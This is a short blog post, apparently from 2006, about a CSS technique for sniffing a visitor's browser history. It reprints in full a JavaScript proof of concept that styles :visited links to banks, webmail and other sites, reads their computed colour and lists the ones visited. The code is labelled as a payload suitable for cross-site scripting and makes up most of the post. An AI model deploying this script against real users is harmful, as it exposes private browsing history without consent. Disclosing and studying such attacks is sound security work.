Stealing History
Update: Cody Swan has a version that works in IE and supports AJAX to log the urls somewhere. Info here.
Jeremiah Grossman has demonstrated an interesting way to sniff out browser history via CSS hacks. IE7 RC1 is smart enough to block the site, but FireFox lists my history without any complaints. Spooky. The script it embedded on the page, and it appears that basic technique involves setting the visited link color via CSS on a group of links to common sites, and then getting the computed values of the links and seeing which ones have the visited color. Very clever way to hijack someone's history:
<script>
var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);
// popular websites. Lookup if user has visited any.
var websites = [
"http://login.yahoo.com/",
"http://www.jailbabes.com",
"http://ha.ckers.org",
"http://seoblackhat.com",
"http://www.cgisecurity.com",
"http://www.spidynamics.com",
"http://www.cenzic.com",
"http://www.watchfire.com",
"http://www.ntobjectives.com",
"http://www.webappsec.org",
"http://www.whitehatsec.com",
"http://english.aljazeera.net/HomePage",
"http://mail.google.com/",
"http://mail.yahoo.com/",
"http://my.yahoo.com/",
"http://slashdot.org/",
"http://www.myspace.com/",
"http://www.amazon.com/",
"http://www.aol.com/",
"http://www.bankofamerica.com/",
"http://www.bankone.com/",
"http://www.blackhat.com/",
"http://www.blogger.com/",
"http://www.bofa.com/",
"http://www.capitalone.com/",
"http://www.chase.com/",
"http://www.citibank.com/",
"http://www.cnn.com/",
"http://www.comerica.com/",
"http://www.e-gold.com/",
"http://www.ebay.com/",
"http://www.etrade.com/",
"http://www.google.com/",
"http://www.hsbc.com/",
"http://www.icq.com/",
"http://www.microsoft.com/",
"http://www.msn.com/",
"http://www.myspace.com/",
"http://www.passport.net/",
"http://www.paypal.com/",
"http://www.sourceforge.net/",
"http://www.statefarm.com/",
"http://www.usbank.com/",
"http://www.wachovia.com/",
"http://www.wamu.com/",
"http://www.wellsfargo.com/",
"http://www.xanga.com/",
"http://www.yahoo.com/",
"https://commerce.blackhat.com/",
"https:/banking.wellsfargo.com/",
];
/* prevent multiple XSS loads */
if (! document.getElementById('xss_flag')) {
var d = document.createElement('div');
d.id = 'xss_flag';
document.body.appendChild(d);
var d = document.createElement('table');
d.border = 0;
d.cellpadding = 5;
d.cellspacing = 10;
d.width = '90%';
d.align = 'center';
d.id = 'data';
document.body.appendChild(d);
document.write('<style>');
for (var i = 0; i < websites.length; i++) {
document.write('#id' + i + ":visited {color: #0000FF;}");
}
document.write('</style>');
/* launch steal history */
if (is_mozilla) {
stealHistory();
}
}
/*--- [method: stealHistory] -------------------------------------------#
# Description: Send a browsers history to an off-domain URL. #
-----------------------------------------------------------------------*/
function stealHistory() {
// loop through websites and check which ones have been visited
for (var i = 0; i < websites.length; i++) {
var link = document.createElement("a");
link.id = "id" + i;
link.href = websites[i];
link.innerHTML = websites[i];
document.body.appendChild(link);
var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
document.body.removeChild(link);
// check for visited
if (color == "rgb(0, 0, 255)") {
document.write('<li><a href="' + websites[i] + '">' + websites[i] + '</a></li>');
} // end visited check
} // end visited website loop
} // end stealHistory method
</script>
[1] http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html